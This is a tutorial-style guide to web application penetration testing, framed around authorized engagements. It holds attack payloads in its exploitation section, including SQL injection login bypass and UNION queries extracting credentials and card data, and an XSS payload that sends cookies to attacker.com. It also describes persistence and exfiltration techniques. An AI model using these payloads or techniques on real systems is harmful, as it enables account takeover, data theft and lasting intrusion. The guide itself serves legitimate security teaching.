Conducting a Comprehensive Web Application Penetration Test

Penetration testing is a structured process of simulating real-world cyberattacks on an organization’s systems to identify and address vulnerabilities before attackers exploit them . This guide provides an expert-level walkthrough of a complete penetration test from start to finish, focusing on web applications as the primary target. While our emphasis is on web platforms, the methodologies and insights described here apply broadly to other environments as well, including API endpoints, mobile applications, and cloud infrastructures. The core phases – from careful planning to final reporting – remain fundamentally the same across these domains. By following a standardized methodology (such as the widely adopted Penetration Testing Execution Standard, PTES), testers ensure that every stage of the test, from scoping and planning to exploitation and reporting, is handled in a consistent and thorough manner . The result is a penetration test that not only uncovers technical weaknesses but also provides actionable guidance aligned with industry best practices and compliance requirements.

In the sections below, we detail each phase of a penetration test, explain its purpose, and provide practical examples and tools. We will also highlight common web attack scenarios (e.g., SQL injection, XSS, authentication bypass) with real-world payload snippets that can double as a handy cheat sheet. Finally, we discuss how to align the pen test process with compliance frameworks like ISO 27001, PCI-DSS, and GDPR, and we outline a structured approach to reporting the results (including an executive summary, technical findings with severity ratings, remediation guidance, and compliance impact mapping). This comprehensive approach ensures that the penetration test is not only technically effective but also business-aligned, helping security professionals, developers, IT managers, CISOs, and consultants communicate findings and improve security postures in a meaningful way.

Scoping and Planning

The first phase, often called Pre-Engagement Interactions or scoping, sets the foundation for a successful penetration test. This planning stage is crucial to define what will be tested, how the test will be conducted, and under what constraints . The tester and the client organization establish the engagement’s scope (target systems, applications, networks, and specific in-scope components) as well as the rules of engagement. Key considerations in this phase include:

Objectives and Goals: Clarify what the client hopes to achieve (e.g., assessing the security of a new web application, meeting compliance requirements, etc.). Understanding business objectives helps prioritize critical systems and high-risk areas.
Logistics and Schedule: Determine the testing timeline, including start and end dates, testing windows (especially if there are restricted hours to avoid peak usage), and communication channels. Ensure stakeholders on both sides know when testing will occur to avoid confusion with real attacks.
Legal and Authorization: Obtain proper written permission to test the targets. This typically involves signing NDA (Non-Disclosure Agreements) and a Rules of Engagement document. Legal authorization protects the tester and the client by clearly sanctioning the activity. It also defines what actions are prohibited (for example, causing deliberate denial of service may be off-limits unless explicitly allowed).
Testing Boundaries: Define in-scope vs. out-of-scope assets. For instance, the test may include the production web application and a staging API, but explicitly exclude the corporate email server or third-party services. This prevents accidental impact on systems that should not be tested. If cloud resources or third-party APIs are in scope, ensure those providers are also notified/cleared.
Methodology and Test Types: Agree on the type of test approach – black box, gray box, or white box. In a black-box test, the tester has no prior knowledge of the target’s internal workings (simulating an external attacker). In a white-box test, full information (source code, architecture diagrams, credentials, etc.) is provided to simulate an insider or to maximize coverage. Gray-box is a mix, with limited information shared. This choice will influence how the test is executed . Also plan whether social engineering or physical tests are included (for web platform tests these are often out of scope, but phishing or phone-based social engineering might be considered if the goal is broader).
Compliance Considerations: If the test is being conducted for compliance (e.g., PCI-DSS, ISO 27001) or customer assurance, note any specific requirements. For example, PCI-DSS may require both external and internal tests; GDPR concerns might limit testing on production personal data. Aligning the plan with these needs ensures the results will support the necessary compliance reports.
Tools and Resources: Identify any specific tools, frameworks, or credentials needed. For instance, ensure the tester has accounts with appropriate access if it’s a credentialed test, or gather open-source intelligence resources if needed. While specific tools are usually chosen later (Reconnaissance and beyond), planning may involve getting approval for certain testing tools or techniques if they could be disruptive.

Effective scoping avoids misunderstandings and paves the way for a smooth test. At the end of this phase, both parties should have a shared understanding of the test’s scope, timeline, and rules. Documentation from this stage may include a Scope Definition document, a Rules of Engagement contract, and a Test Plan outlining methodologies to be used. Proper planning ensures that the penetration test is goal-oriented and respects the operational needs of the target environment .

Reconnaissance (Passive and Active)

After planning, the tester moves into Reconnaissance, the information-gathering phase. Reconnaissance (often split into passive and active recon) is critical for understanding the target’s footprint and identifying potential attack vectors . In the context of a web platform, reconnaissance will involve gathering information about the target web application, its infrastructure, and any related assets (like APIs, subdomains, etc.), all without actually exploiting anything yet.

Passive Reconnaissance: In passive recon, the tester collects information without directly interacting with the target in a way that would alert or affect it. This often means leveraging publicly available data sources and OSINT (Open-Source Intelligence). Key passive recon activities include:

Footprinting and OSINT: Searching the web for information leakage about the application or organization. This could involve Google dorking (crafting Google queries to find sensitive info), scanning pastebin and GitHub for leaked credentials or API keys, and reading technical forums or social media for clues. For example, a Google search might uncover an old employee CV listing the technologies used in the web app, or a GitHub repository might accidentally contain API secrets.
Domain and DNS Recon: Identifying all domain names and subdomains related to the target. Tools like Amass, Sublist3r, or OWASP Amass can enumerate subdomains via OSINT, and certificate transparency logs can reveal hostnames. WHOIS lookups can provide registrar info and perhaps contacts or infrastructure details. Passive DNS databases can show historical DNS records.
Public Breach Data: Checking if any known data breaches involved the target domain (using services like HaveIBeenPwned or similar) to gather credential patterns or older passwords that might still be in use.
Infrastructure Information: Looking at technologies the site uses by examining HTTP responses or using fingerprinting tools (e.g., BuiltWith or Wappalyzer) to list frameworks, server software, or third-party services. This helps later in identifying known vulnerabilities in those components.
Social Engineering Intelligence: If allowed, gather names and roles of key employees via LinkedIn or company sites – useful for potential phishing or guessing common usernames. This is more peripheral for a strictly web app test, but part of broader recon if social engineering is in scope.

Importantly, passive recon is performed without sending direct packets to the target systems – it uses third-party databases, search engines, and public sites, so it’s generally stealthy. For example, a tester might find an old conference presentation by the company’s engineers that describes their web app architecture, which could reveal an API endpoint URL or database type.

Active Reconnaissance: Active recon involves interacting with the target environment to discover information. This phase does send traffic to the target systems but stops short of actual exploitation. The goal is mapping the attack surface: identifying open ports, services, application endpoints, user entry points, etc. Key active recon steps include:

Network Scanning: Using tools like Nmap to scan the target server(s) for open ports and running services. For a web application, this might reveal additional services besides HTTP/HTTPS – for instance, an open SSH or database port on the same server. Nmap scripts (NSE) can also do service version detection and basic vulnerability checks.
Enumeration of Websites and APIs: Actively exploring the web application to catalog its endpoints and functionalities. This often means running a web crawler (such as the one built into Burp Suite or OWASP ZAP) to enumerate all pages, forms, and parameters. Directory brute forcing tools like Dirbuster or ffuf/Wfuzz can find hidden files or directories (e.g., backup files, admin panels) by trying common names.
Service Banner Grabbing: Capturing service banners or responses to identify software versions (e.g., the HTTP Server header might reveal the web server and version, or an SMTP banner on port 25 might leak its mail server version). This is useful for later vulnerability research.
Active DNS Probing: Using DNS zone transfer attempts (if misconfigured), or brute forcing subdomains (as active complement to passive findings). Tools like dnsrecon or DNSGlue can help here.
Email and Employee Enumeration: If relevant, verify corporate email format or gather a list of user accounts (sometimes via tools like theHarvester, which does search engine scraping for emails). This could be used in password spraying or username enumeration later (relevant if the web app uses corporate single sign-on, for instance).
Cloud Asset Discovery: If the app is hosted in the cloud, active recon might involve checking for misconfigured S3 buckets or Azure blobs, etc., that are publicly accessible. Tools or scripts designed for cloud recon (like AWS CLI for listing open S3 buckets if guessable, or tools like CloudMapper) might be employed.

Active recon must be done carefully to avoid triggering security alarms too early. Many testers start with stealthier scans (e.g., slow-paced Nmap scans or specific target probes) to map the surface without causing heavy traffic.

During recon, testers often compile a list of discovered hosts, ports, and application entry points. For example, the reconnaissance might reveal a subdomain like api.example.com hosting a backend API, or find that admin.example.com exists and presents a login page – indicating an administration portal that could be a high-value target. All these findings feed into the next phase by highlighting where threats might exist.

Tools and Techniques for Recon:

Passive Recon Tools: Search engines (Google, Bing dorks), Shodan (for finding devices or services by banner), theHarvester (to collect emails and subdomains from public sources), and certificate transparency logs (via tools like crt.sh). Social media and LinkedIn for gathering personal info. Public code repos (GitHub searches for the company name).
Active Recon Tools: Nmap (port scanning and service enumeration) , Amass (active subdomain enumeration combining OSINT and brute force), Burp Suite’s Spider for crawling, OWASP ZAP for passive scan while browsing, Nikto (a simple web server scanner for known vulnerabilities and misconfigs), and WhatWeb or Nmap http-enum script for identifying web platform technologies. For DNS: dnsrecon or Fierce. For content discovery: Dirbuster/Dirb, Gobuster, or Wfuzz to brute force URL paths.

By the end of Reconnaissance, the tester should have a map of the attack surface: a list of IPs/domains, open ports/services, software versions, and web application endpoints (URLs, parameters, forms). This map is the basis for the next steps – Threat Modeling and Vulnerability Discovery – where we analyze these areas for potential weaknesses. As security expert Michael Simpson aptly noted, finding vulnerabilities requires both broad scanning and focused analysis: regular scanning (external and internal) will uncover many known weaknesses , but it’s the deep manual probing that finds the subtle issues.

Threat Modeling and Attack Surface Mapping

In the Threat Modeling and Attack Surface Mapping phase, information gathered from recon is analyzed to postulate how an attacker might attempt intrusions. Essentially, the tester steps back and asks: Given what we know about the system, what are the likely targets and attack vectors? Threat modeling often involves identifying the key assets, entry points, and threat agents, then mapping possible attacks to those points.

For a web platform, this phase might include:

Identifying High-Value Assets: Determine what data or functionality in the application would be most valuable or damaging if compromised. This could be personal customer data, financial information, intellectual property, or administrative controls. For example, an online banking site’s high-value assets include account balances and transfer functionality; an e-commerce site might prioritize customer info and payment processing.
Mapping Application Architecture: Understand how the application is structured. Is it a classic three-tier app with web, application, and database servers? Is there a content delivery network (CDN) or cloud services integrated? Identify trust boundaries (e.g., front-end vs. back-end communications, third-party integrations) where data flows in/out – these often become attack points (for instance, an API that the mobile app uses could be a weak link).
Enumerating Entry Points: List all the ways an attacker could interact with the system. This includes web form inputs, URL parameters, file upload interfaces, APIs endpoints, authentication portals, and even less-obvious points like email inputs (for injection via contact forms) or OAuth redirects. Don’t forget out-of-band channels: if the web app sends notifications or integrates with mobile push, those could be vectors too.
Threat Scenarios: Using models like STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) or ATT&CK, think of potential threats for each entry point. For example, for a login page (entry point) – threats include credential stuffing, SQL injection in the login form, brute force attacks, or session hijacking. For a file upload feature – threats include uploading web shells or malicious files to execute code.
Prioritizing Attack Vectors: Not all discovered points are equal. Threat modeling helps prioritize likely attack paths. If recon showed the web server is running an outdated version with known exploits, that’s a priority. If an admin portal was found, that’s high priority due to potential high impact. Essentially, rate findings by likelihood and impact.
Attacker Profiles: Consider different attacker profiles (external hacker, malicious insider, etc.) and how they might approach the system. For web apps, the primary profile is an external remote attacker (maybe an anonymous user or someone with a basic user account trying to escalate privileges). However, if insiders are in scope, threat modeling might also consider what an employee with limited access could do (for instance, a user of the app trying to access other users’ data).
Attack Surface Visualization: It can be helpful to create a simple diagram or list that maps out the relationships: e.g., User -> Web Frontend -> API -> Database, and note known vulnerabilities or misconfigs at each layer from recon. Mark the trust boundaries and data flows. This visualization clarifies how an exploit in one area might pivot to another (for example, a SQL injection in the API could lead to database access, which might store hashed passwords that could be cracked offline).

Often, threat modeling and vulnerability analysis go hand-in-hand . The tester uses the intel from recon to hypothesize where vulnerabilities likely reside and then focuses analysis efforts there. For instance, if recon revealed an /admin page, threat modeling would flag that as a critical area to test for authentication bypass or default credentials.

According to the PTES and other methodologies, in this stage the tester identifies potential targets and maps attack vectors, using the intel gathered . Some common categories of assets to consider during threat modeling include sensitive data stores (customer databases, confidential files), critical business services (payment gateways, order processing), admin interfaces, and integrations with external systems . By cataloguing these, the tester creates a blueprint of “what’s at stake” and “how it could be attacked.”

Example: Imagine a web application that allows users to upload profile pictures and also has an admin panel for managing users. Threat modeling would note the file upload feature as a risk area (possible file inclusion or storage XSS if images are not handled safely). It would also identify the admin panel as high value: perhaps consider brute force or SQL injection on the admin login, or privilege escalation if a regular user can somehow access admin functions. If the recon found that the site uses a certain JavaScript library with known XSS issues, threat modeling flags that for testing.

At this phase, testers may also use threat modeling tools (like OWASP Threat Dragon or Microsoft’s Threat Modeling Tool) to systematize the process, though many experienced testers do it informally using checklists and intuition. They might cross-reference known attack lists like the OWASP Top 10 or SANS 25 to ensure all common web vulnerability categories are considered against the target.

Attack Surface Reduction Check: Sometimes threat modeling also informs immediate fixes – if something is obviously out of scope or not needed, the client might be advised to disable it before testing (though usually that’s addressed post-test). But generally, any glaring issues found in recon (like an open database port) are noted as very likely paths to attempt in exploitation.

By the end of this phase, the tester has a clear plan of attack: a prioritized list of potential vulnerabilities to validate and exploit. This guides the next phase, Vulnerability Discovery, to ensure the testing is thorough and focused on the most relevant risks. Essentially, Threat Modeling turns raw recon data into an actionable attack plan, ensuring that no significant threat is overlooked in the subsequent active testing.

Vulnerability Discovery (Automated and Manual)

The Vulnerability Discovery phase is where the tester actively probes the target to find security weaknesses. This phase combines automated scanning techniques with manual testing to uncover as many vulnerabilities as possible. The goal is to identify all points where the system deviates from secure behavior – misconfigurations, outdated software, coding flaws, and logic errors – and to validate those findings. It’s often helpful to think of this phase in two parts: Automated scanning for broad coverage and Manual deep-dive testing for subtle issues.

Automated Vulnerability Scanning: Automated tools can quickly scan the application and underlying systems for known issues. These tools are like a “first pass” – efficient at finding common vulnerabilities and low-hanging fruit, but they might miss complex logic flaws or novel issues. Examples of automated scanning in a web context include:

Web Vulnerability Scanners: Tools like OWASP ZAP (open-source) or Acunetix, Netsparker, Burp Suite scanner (commercial) can crawl the web application and test for a plethora of issues (SQL injection, XSS, CSRF, file inclusion, etc.). They inject payloads into parameters and analyze responses for signs of vulnerabilities (e.g., an alert in the page or an SQL error in the response).
Network/Port Scanners with Vuln Detection: If the scope includes the server, running Nessus, OpenVAS, or QualysGuard can check the server and OS for known CVEs (Common Vulnerabilities and Exposures) based on service banners and probe responses. For example, they might detect that the web server is running Apache version X.Y which has a known remote code execution CVE.
Dependency Scanners: If some access to the code or at least the list of front-end libraries is known (sometimes package manifests are publicly accessible or can be inferred from loaded scripts), tools can identify known vulnerable versions (like retire.js for JS libraries).
Configuration Scans: Tools or scripts to check common config issues (for instance, test if directory listing is enabled on web directories, or if default admin pages (like /phpmyadmin/) are accessible). Nikto is a classic lightweight scanner that checks for over 6000 potentially dangerous files/versions on web servers .
Authentication/Session Checks: Some automated tools will also test cookie settings (for secure flags, HTTPOnly), SSL/TLS configuration (protocol strength, known weaknesses via tools like SSL Labs scanner), and other best-practice configurations.

Automated scans will generate a list of potential findings. It’s crucial to review and validate these because scanners can produce false positives or findings of varying severity. For instance, an automated scan might flag a verbose error message or a missing security header – useful to note but not all are critical issues.

Manual Testing: Manual testing is where the penetration tester’s expertise is fully exercised. A human tester can perform contextual, creative tests that tools cannot. Manual techniques include:

Fuzzing Inputs: Using tools like Burp Suite Intruder or ffuf to systematically fuzz parameters with custom payloads. For example, fuzzing an upload file parameter with different file types or fuzzing an id parameter with SQL injection payloads to see how the application responds.
Testing Business Logic: Automated tools struggle with logic flaws (e.g., “can user A access user B’s data if they change the userID in the request?”). Testers manually attempt things like Insecure Direct Object References (IDOR) by changing identifiers, skipping steps in multi-step processes (like bypassing a payment step), or performing actions out of expected sequence. For instance, manually test if you can place an order with a negative price, or apply the same coupon multiple times – things specific to the application’s logic.
Authentication and Authorization Flaws: Manually verify the strength of authentication. Try common default credentials (like admin/admin, test/test) on login pages. Attempt to brute force if lockout is not in place (using a tool like Hydra or Burp Intruder with a password list). For authorization, if multiple roles exist (user vs admin), test horizontal and vertical privilege escalation: e.g., as a normal user try accessing admin functionality or another user’s data by altering URLs or IDs. These tests often require logging in as different users and comparing responses – a very manual process.
Session Management: Check if session tokens can be predicted or if they’re properly invalidated on logout. For example, observe session cookies and attempt to reuse them after logout or see if session fixation is possible (setting a known session ID).
Injection Attacks: Beyond what scanners do, manually craft tailored injection payloads for SQL, XSS, XML, command injection, etc., especially if the app is not standard. For SQL injection, a tool like SQLMap can automate exploitation once a suspect parameter is found, but the tester must guide it. For XSS, testers will manually try variants to bypass filters, using tricks that automated scanners might not know. The tester might also test for less common injections like Server-Side Template Injection (SSTI), HTTP header injections, etc., based on the tech stack.
File Upload and Path Traversal: If file uploads are allowed, manually attempt to upload malicious files (like a .php webshell if it’s a PHP server) or files with path traversal (../) in the filename to see if the file system can be accessed. Also test downloading or viewing files via path parameters to find LFI (Local File Inclusion) or directory traversal vulnerabilities.
Client-Side and API Testing: Use developer tools and proxies to inspect API calls made by web or mobile clients. Test those APIs directly for missing access controls (e.g., try calling an admin API as a normal user). Also inspect JavaScript for clues (hidden endpoints, API keys).
Cryptographic issues: If the application uses encryption (tokens, cookies), analyze if it’s using hardcoded secrets or weak algorithms. For example, a JWT token might not be signed or might use a guessable secret – a manual tester might attempt to crack or fake a token if the algorithm looks weak.

A skilled tester will verify each suspected vulnerability manually, even if found by a scanner, to eliminate false positives and to gauge the actual impact. For example, if a scanner reports an “SQL injection,” the tester will try to hand-inject something like ' OR '1'='1 to see if it truly bypasses login, confirming the finding . Likewise, for XSS, the tester will attempt an actual script payload in the relevant field to see if it executes in a browser .

It’s often said that both automated and manual testing are essential for a comprehensive assessment – automated tools provide breadth, and manual testing provides depth . Automated scans might uncover 80% of common issues quickly, but the remaining 20% – often the most dangerous or unique flaws – require a human eye and creativity.

Throughout this phase, documentation is key. The tester keeps notes of each potential vulnerability, how it was tested, and the result (sometimes capturing screenshots or tool output). If something is found, they may also prepare proof-of-concept payloads or exploits to use in the next phase (Exploitation). Conversely, if no vulnerability is found in a particular area, it’s good to note what was attempted – this can be useful for the report to demonstrate coverage.

By the end of Vulnerability Discovery, the tester should have a list of confirmed (or highly suspected) vulnerabilities in the target web application and infrastructure. This list might include issues like “SQL Injection in search parameter allows extracting user data”, “Reflected XSS on the feedback form”, “Admin portal has default credentials”, “Outdated OpenSSL library with known CVE-XXXX-YYYY”, etc., each with evidence. This feeds directly into the Exploitation phase, where the tester will actively use these vulnerabilities to demonstrate impact.

Exploitation

In the Exploitation phase, the penetration tester takes the confirmed vulnerabilities from the discovery phase and actively uses them to gain unauthorized access or perform unauthorized actions on the target. This phase answers the question: What can a malicious actor achieve by exploiting these weaknesses? It’s where theoretical findings turn into demonstrable impact – e.g., extracting data, defacing the site, or taking over an account (all within the agreed scope and rules, of course).

The approach to exploitation is typically: prioritize exploits for high-impact vulnerabilities first, while maintaining stealth and safety (especially if testing a live production system). The tester will attempt to go as far as allowed by scope – for instance, if the goal is to see if a customer database can be dumped, they will push until that’s achieved, but if the rules forbid altering data, they might stop short of something like creating new admin users unless permitted. Throughout this phase, careful notes are kept on what was done, both for reporting and in case something needs to be rolled back.

Let’s look at some example attack scenarios and how a tester might exploit them, complete with real-world payloads/snippets to illustrate:

Example: SQL Injection Exploitation

Scenario: During discovery, the tester found that a certain HTTP GET parameter (e.g., ?id= on a product page) is vulnerable to SQL injection. Exploitation involves using this flaw to retrieve sensitive data or bypass security controls.

One common critical impact of SQL injection is authentication bypass. For example, suppose the application has a login form that is susceptible to SQL injection in the username field. An attacker can supply a crafted input that tricks the application into logging them in without valid credentials. A classic payload is:

' OR 1=1--

When entered as a username (along with any password), this payload might transform the backend SQL query into a condition that is always true. For instance, the query might become:

SELECT * FROM users WHERE username = '' OR 1=1-- ' AND password = 'password';

Because the OR 1=1 always yields true (and the -- comments out the rest of the query), the database returns the first user in the table – often the admin . As a result, the tester (or attacker) is logged in as that first user, effectively bypassing authentication altogether. Indeed, using ' OR 1=1-- in a vulnerable login field is a time-tested technique to gain admin access without credentials.

Beyond login bypass, SQL injection exploitation can allow data extraction. Testers can use payloads like UNION SELECT statements to fetch data from other tables. For example, if a search field is vulnerable, a union-based injection might be:

' UNION SELECT username, password, credit_card FROM users--

This would append a second query result combining user credentials and credit card info (just as an illustrative example) to the original query’s results, exposing sensitive data in the web page if the output is visible. In more covert cases (like blind SQL injection), the tester might use time delays ('; IF condition THEN pg_sleep(5)--) or out-of-band network calls to exfiltrate data.

Often, testers will employ tools like SQLMap to automate deep extraction once they confirm a SQLi. SQLMap can dump entire databases by iteratively exploiting the injection. But using it still requires caution and sometimes tweaks to avoid disrupting the application.

Snippet (authentication bypass via SQLi):

Username: ' OR '1'='1
Password: [anything]

This input logs in the tester as the first user (e.g., admin) if the login form is vulnerable . After such a login, the tester might gain access to admin-only functionality, demonstrating a severe breach of authorization.

Example: Cross-Site Scripting (XSS) Exploitation

Scenario: The tester discovers that a certain parameter (say, a search query parameter or a profile name field) is reflected in the page without proper encoding, making it vulnerable to XSS. In exploitation, the goal is to execute JavaScript in a victim’s browser, which can be used to steal data or perform actions on behalf of the user.

For demonstration, testers often use a simple pop-up alert payload to show XSS execution. For example:

<script>alert("XSS")</script>

If the tester inputs this into a vulnerable field and the text is reflected on a page (and not sanitized), a dialog saying “XSS” will pop up in the browser . This proves that arbitrary script can run. While an alert is benign, the implication is that an attacker could inject any script – such as one to steal the user’s session cookie, redirect to a phishing site, or log keystrokes.

For instance, a more malicious XSS payload might steal cookies:

<script>new Image().src="http://attacker.com/stolen.php?cookie="+document.cookie</script>

This, when executed in a victim’s browser, would send their session cookie to the attacker’s server (allowing session hijack). A tester might not actually exfiltrate data to an external site during a test (to avoid legal issues), but they could simulate it or demonstrate the ability to do so by showing the payload.

XSS can be exploited in stored form as well – e.g., posting a script to a message board that triggers for any viewer. The tester will attempt to inject such payloads and then observe if other accounts (or their own account after logout) encounter the malicious script execution.

Snippet (simple XSS proof-of-concept):

<form action="/search"><input name="q" value='"><script>alert("XSS")</script>'></form>

(The above snippet illustrates an injection in a form field; when rendered by a vulnerable page, it would execute the script.)

Exploitation result: The tester confirms they can execute JavaScript on users’ browsers. They might demonstrate impact by, say, showing that they could hijack a demo account’s session or deface part of the webpage through DOM manipulation.

Example: Privilege Escalation

Scenario: The tester has managed to gain a foothold – perhaps they created a low-privileged account on the web app via a registration function, or they found credentials allowing access to a limited user account. Now, the aim is to escalate privileges – either within the application (from a regular user to an admin user) or on the underlying system (from web application access to server system access with higher privileges). Privilege escalation is often a bridge between initial exploitation and full control of a system.

Application-Level Privilege Escalation: One common issue is an access control flaw where user input isn’t properly checked. For example, an e-commerce application might allow users to view their own orders via /order?order_id=12345. If the tester changes the number to someone else’s order (order_id=12344), and if the app doesn’t verify ownership, they might see another user’s order – that’s horizontal privilege escalation (user vs user data access). A more severe vertical escalation would be if a normal user discovers an admin-only function that isn’t properly protected. For instance, if there’s an admin panel link not visible to them by UI but still accessible by URL, and they can reach it just by knowing the URL (and the server doesn’t block it), that’s a serious issue. Testers will try various role manipulation tricks: modifying cookies or JWTs that encode roles, force-browsing to admin pages, or using a normal user account to call admin APIs by changing parameters like role=admin in requests, etc.

Another scenario: If password reset functionality is weak (e.g., not asking security questions properly or using predictable tokens), a tester might exploit that to reset an admin’s password and thus escalate to admin access.

System-Level Privilege Escalation: If the test involves exploiting the server (for instance, through a successful SQL injection leading to a shell, or an RCE vulnerability), the tester might end up with a shell on the web server as a low-privileged user (e.g., the web server runs as www-data on Linux). Now the task is to gain higher OS privileges (root on Linux or SYSTEM/Administrator on Windows). Techniques for this include: finding misconfigured SUID programs, exploiting known kernel vulnerabilities, abusing service configurations, or simply using stolen credentials. Tools like Metasploit’s Meterpreter have built-in scripts (e.g., the getsystem command on Windows) to automate privilege escalation attempts . For example, Meterpreter’s getsystem will try multiple techniques to elevate to SYSTEM on Windows (like named pipe impersonation) . On Linux, a tester might run a local exploit for a known kernel bug (if the kernel is outdated) or exploit a cron job running as root with insecure settings.

Snippet (Linux privilege escalation via local exploit):

$ whoami
webuser
$ ./exploit_priv_escalation   # run compiled exploit for a known vulnerability
# whoami
root

In this hypothetical snippet, the tester had a local exploit (perhaps for Dirty COW or similar kernel vulnerability) and after running it, the prompt changed from $ (normal user) to # (root), indicating full system compromise.

In many cases, privilege escalation on the host is beyond the strict scope of a web app test unless explicitly allowed (it turns a web vuln into infrastructure takeover). But it’s often allowed to illustrate impact. For example, through an SQL injection leading to RCE, the tester spawns a shell and then escalates to root, demonstrating that the entire server could be owned. This underscores the risk to the client in concrete terms.

Even within the app, an example of vertical priv esc: Suppose the tester finds an “admin=true” flag in a session cookie. If setting that to true as a normal user grants admin rights (because the app does not properly validate it on the server side), the tester has effectively escalated privileges. They would demonstrate by, say, accessing the admin dashboard and taking a screenshot.

Privilege escalation exploitation shows how an initial foothold can lead to broader compromise. Testers will often chain vulnerabilities here – for instance, use SQL injection to get a user password hash, crack it to login, then from that user account exploit an insecure direct object reference to access admin data.

Example: Authentication Bypass

Scenario: The tester suspects or discovers a flaw that allows skipping or bypassing the normal authentication process of the application. We already saw one form of auth bypass via SQL injection. However, there are other kinds of authentication bypasses, such as logic flaws or use of default credentials.

Default Credentials / Weak Credentials: It’s surprising how often admin interfaces use default passwords (like admin:admin or admin:password). A tester will try a list of very common credentials on login pages (especially for known software if the app uses something off-the-shelf). If an admin console is found, trying admin/admin or administrator/password123 might yield access. This isn’t fancy, but it’s a valid exploitation of weak security practices. For example, a network device or a CMS backend might still have the factory default password – logging in with that gives full control.

Authentication Logic Flaws: Sometimes the flaw is in how the app handles sessions or password reset. Consider a password reset function that emails a link with a token like https://site/reset?token=ABC123. If the token is not properly random or is guessable (maybe it’s just a base64 of the username), a tester might predict tokens and reset other users’ passwords (gaining access to their accounts). That’s an auth bypass in the sense of account takeover without knowing credentials.

Another example is multi-step auth where a tester can force the app to skip a step. For instance, in OAuth flows, if the app isn’t careful, a tester might be able to manipulate a hidden form value to mark email verification as done without actually entering a code.

Session Hijacking: If the tester can steal a valid session cookie (through XSS or sniffing an insecure connection), that’s effectively an auth bypass – they bypass login by using someone else’s session. During exploitation, the tester might demonstrate this by sidejacking their own account’s session in another browser to show it’s possible (especially if cookies aren’t tied to IP or have other protections).

Snippet (for a simple logic bypass): Not an exact payload like others, but for example, if an app sets a cookie logged_in=false upon login and then flips it to true after successful auth, what if the tester manually changes logged_in=false to true before authentication? If the server foolishly trusts that, the tester is in. (This would be a very blatant flaw, but such things have occurred in poorly designed systems.)

A real example: Some years ago, certain frameworks had URL rewriting for login, like https://site.com/login?returnUrl=/admin. If you changed the URL to https://site.com/admin without a session, some misconfigured systems would internally create a session for you as admin (skipping auth). Testers check these odd cases too.

Brute Force Attacks: If no lockout is implemented, a tester might attempt a brute-force of credentials. Tools like Hydra or Burp Intruder can try many username/password combos. While not exactly a “bypass” (it’s just guessing the correct password), in absence of protections it’s a serious risk. A common exploitation is to use a list of leaked passwords against known user emails – if one works, the tester proves a breach (and recommends adding 2FA or lockout).

In all cases of auth bypass, once in, the tester confirms what level of access they have. If it’s an admin account, they’ll test some safe admin actions to demonstrate control (like viewing user lists, etc.). If it’s a user account takeover, they may illustrate by retrieving that user’s personal data.

Tools and Techniques for Exploitation:

During exploitation, various specialized tools might be used depending on the vulnerability:

Burp Suite Repeater/Intruder: For manual crafting and replaying of malicious requests (SQLi, XSS payload injection, modifying parameters for auth bypass, etc.). Burp’s extensible plugins (like Autorize for authZ testing) help too.
SQLMap: As mentioned, automates SQL injection exploitation and data dumping.
Metasploit Framework: Useful if the exploitation involves known exploits (e.g., exploiting an outdated software version on the server). It has modules for many CVEs – for example, if recon found the server runs a vulnerable version of Apache Struts, Metasploit likely has an exploit module to get a shell.
Custom scripts or one-liners: For instance, using cURL or Python requests to loop through numeric IDs (for IDOR testing) or to exploit an API.
Browser and Proxy: Simply using the web app in a browser with developer tools can be enough for certain exploits (like intercepting and modifying a JWT token).
Privilege Escalation scripts: If OS-level work is involved, tools like LinPEAS/WinPEAS (for automated local enumeration), mimikatz (to extract Windows credentials from memory after privilege escalation), etc., could be employed.

Throughout exploitation, the tester maintains professionalism: only doing what’s allowed (e.g., if they exploit a vulnerability to exfiltrate data, they might extract just a few records as proof, not the entire database). The goal is to demonstrate impact without causing undue harm to the system or data integrity. For example, if the test is on a production system with real data, and they achieve admin, they won’t actually delete users or change passwords; instead, they might create a harmless indicator (like a test user or a file) to prove the level of access and then remove it.

By the end of exploitation, the tester typically has gathered “trophies” – evidence of what they could do. This could be screenshots of an admin dashboard they shouldn’t access, a snippet of sensitive data pulled from the database, or a shell prompt showing # (root) access on a server. These evidences are extremely useful for the report and for convincing stakeholders of the seriousness of the findings.

Post-Exploitation

Once initial exploits have been carried out, the test moves to Post-Exploitation. In this phase, the focus is on consolidating access, analyzing the value of compromised targets, and determining how an attacker could further leverage this access. Essentially, now that “the door is open,” what can be done inside? For a web application test, post-exploitation often involves working with the results of exploitation, such as exploring a system accessed via a shell or sifting through data that was retrieved. It’s also about demonstrating the potential impact more fully – showing the worst-case scenarios if an attacker were in the same position.

Key objectives and activities in post-exploitation include:

Assess the Compromised System’s Value: Determine what sensitive information resides on or behind the system that was exploited. In a web app context, if the tester gained access to the web server, what data does it hold? Perhaps configuration files with passwords, databases with customer info, or access to internal networks. According to PTES, post-exploitation involves identifying the sensitivity of data on the compromised machine and its usefulness for further attacks . For example, the tester might find a database connection string in a config file; using that, they can connect to the database and dump customer records – showing the business impact.
Data Exfiltration: Simulate an attacker’s attempt to steal data. The tester may gather samples of sensitive data such as user records, proprietary documents, or credentials. This could involve running queries on a database (if SQL injection gave direct DB access) or using the file system access via a shell to locate files of interest (like /etc/passwd, log files containing PII, or backup files). They may also test exfiltration channels – e.g., can data be sent out over the internet from the server? If the organization has egress filters, a creative tester might try to bypass them (for instance, if direct FTP is blocked, maybe DNS queries can be used to smuggle data). Mapping and testing exfiltration paths is part of post-exploitation in advanced engagements , but in a typical web app pentest, it might suffice to show that large volumes of data could be pulled out via the exploited channel.
Privilege Persistence: If allowed by the rules, the tester can demonstrate ways an attacker would maintain long-term access. This could be adding a new admin user account (in the application or on the server OS), installing a web shell or a scheduled task that reopens access, or leaving a backdoor in code. Persistence techniques include things like adding an SSH key to ~/.ssh/authorized_keys on a Linux server, or creating a hidden administrative user in the web app database. However, testers must be cautious – any persistent mechanism should be temporary and agreed-upon, and must be removed during cleanup. The purpose is to illustrate that an attacker, once in, could lurk in the system indefinitely despite reboots or password changes. For instance, the Cyphere ISO27001 guide notes testers might attempt to establish a persistent presence through privilege escalation to mimic sophisticated attackers .
Lateral Movement: Although more relevant in network pentests, even in a web test, if the web server is part of a larger network and the tester now has a foothold, they might see if they can pivot. For example, from a compromised web server, they might try to reach an internal application or database that was not directly accessible. This goes beyond the web app itself, but sometimes web apps are an entry to internal networks. If in scope, the tester can illustrate risk by pivoting: using the compromised host to scan the internal network or access an intranet site. (This is often out of scope unless it’s a full red-team type test.)
